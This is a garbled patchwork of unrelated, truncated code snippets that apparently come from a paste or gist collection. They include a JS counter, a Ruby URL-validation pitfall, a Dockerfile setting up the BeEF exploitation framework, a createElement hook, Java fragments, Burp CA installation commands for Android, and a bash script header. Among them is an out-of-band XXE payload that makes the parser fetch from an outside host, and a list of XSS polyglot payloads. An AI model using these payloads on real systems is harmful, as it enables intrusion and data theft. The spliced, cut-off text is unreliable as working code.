var mynamespace = mynamespace || {}; | |
(function(){ | |
var counter = { count: 0 }; | |
/**
 * Adds one to the `count` field of the closure-scoped `counter` object.
 *
 * The same `counter` object is also published as
 * `mynamespace.someobject.counter`, so code outside the closure observes
 * this change and can modify the count itself.
 */
function incrementCounter() {
  ++counter.count;
}
mynamespace.someobject = { | |
counter : counter, |
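# Demonstration of a Ruby regex anchoring pitfall in URL validation.
#
# In Ruby, ^ and $ match at the start/end of every LINE, not of the whole
# string. The value below begins with "javascript:" but carries a newline
# followed by an http URL, so /^https?/ matches on the second line and the
# check wrongly reports the whole value as safe.
a = "javascript:evil();\nhttp://www.vg.no"
if a =~ /^https?/ then
  puts "This is a safe url starting with http or https"
end
# For real validation, anchor to the whole string with \A (and \z at the
# end), e.g. /\Ahttps?:\/\//, or parse the value and compare its scheme
# against an allowlist instead of pattern-matching the raw text.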
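# Base layers for an image that later downloads BeEF 0.4.6.1 into /opt/.
# NOTE(review): the base image is not pinned; pin a release tag or digest so
# a rebuild cannot silently pick up a different base.
FROM ubuntu
# Build toolchain, SQLite and OpenSSL headers, and curl for the later download.
RUN apt-get update && apt-get upgrade -y && apt-get install -y build-essential libsqlite3-dev sqlite3 libssl-dev curl
# Ruby 2.1 is installed from the third-party Brightbox PPA, so the image
# trusts that repository's packages in addition to Ubuntu's own.
RUN apt-get install -y software-properties-common && \
    apt-add-repository -y ppa:brightbox/ruby-ng && \
    apt-get update && \
    apt-get install -y ruby2.1 ruby2.1-dev
WORKDIR /opt/
# Generate and select a UTF-8 locale.
RUN locale-gen en_US.UTF-8
ENV LC_ALL=en_US.UTF-8
# NOTE(review): the instruction that follows fetches a source archive with
# curl; no integrity check is visible in this excerpt. Compare the archive
# against a known SHA-256 before unpacking it.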
RUN curl https://codeload.github.com/beefproject/beef/tar.gz/beef-0.4.6.1 -o beef-0.4.6.1.tar.gz && \ |
var oldCreateElement = document.createElement; | |
document.createElement = function() { | |
var element = oldCreateElement.apply(document, arguments); | |
var oldSetAttribute = element.setAttribute; | |
console.log(arguments, element); | |
element.setAttribute = function(name, value) { | |
if (name == "onsubmit") { | |
console.log(arguments.callee.caller.toString()); | |
} | |
oldSetAttribute.apply(element, arguments); |
public class Dog { | |
private Tail tail; | |
private Head head; | |
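/**
 * Default constructor: delegates to {@link #Dog(Tail, Head)} with a new
 * {@code TailImpl} and a new {@code HeadImpl}, so callers that do not
 * supply their own collaborators get these implementations.
 */
public Dog() {
    // The delegating call must be terminated with a semicolon to compile.
    this(new TailImpl(), new HeadImpl());
}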
public Dog(Tail tail, Head head) { | |
this.tail = tail; | |
this.head = head; |
package no.posten.dpost.sosm; | |
import java.io.ByteArrayInputStream; | |
import java.io.IOException; | |
import java.io.InputStream; | |
import java.net.URL; | |
import java.security.AccessController; | |
import java.security.CodeSigner; | |
import java.security.CodeSource; | |
import java.security.PrivilegedAction; |
http://techblog.vsza.hu/posts/Using_Android_emulator_with_Burp_Suite.html | |
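# Install Burp's CA certificate (burp.cer, DER-encoded) into the system
# trust store of an Android emulator.

# Remount /system read-write so a file can be added under it.
adb shell mount -o rw,remount /system
# Print the certificate in text form to confirm it is the expected one.
openssl x509 -in burp.cer -inform DER -text
# Android names system CA files <subject_hash_old>.0; this prints that hash.
openssl x509 -noout -subject_hash_old -inform DER -in burp.cer
# Copy the certificate in under the hash-based name. 9a5ba575 is presumably
# the hash printed above for this particular burp.cer; use the value your
# own certificate produces.
adb push burp.cer /system/etc/security/cacerts/9a5ba575.0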
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> | |
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> | |
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//> | |
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` | |
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">` | |
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script> | |
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script> | |
javascript:`</template>\"///"//< |
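#!/bin/bash
# Terminal escape sequences used for coloured output: COLOR_NC resets all
# attributes, COLOR_GREEN switches the foreground to green.
export COLOR_NC=$(tput sgr0)
export COLOR_GREEN=$(tput setaf 2)

# Exactly two arguments are required: the image (optionally with a tag) and
# a path inside that image. Diagnostics go to stderr so they are not mixed
# into any output a caller captures from stdout.
if [ $# -ne 2 ]; then
  echo "ERROR: no image given" >&2
  echo "USAGE: ./scan.sh <some_image>[:some_tag] <path in image>" >&2
  exit 1
fi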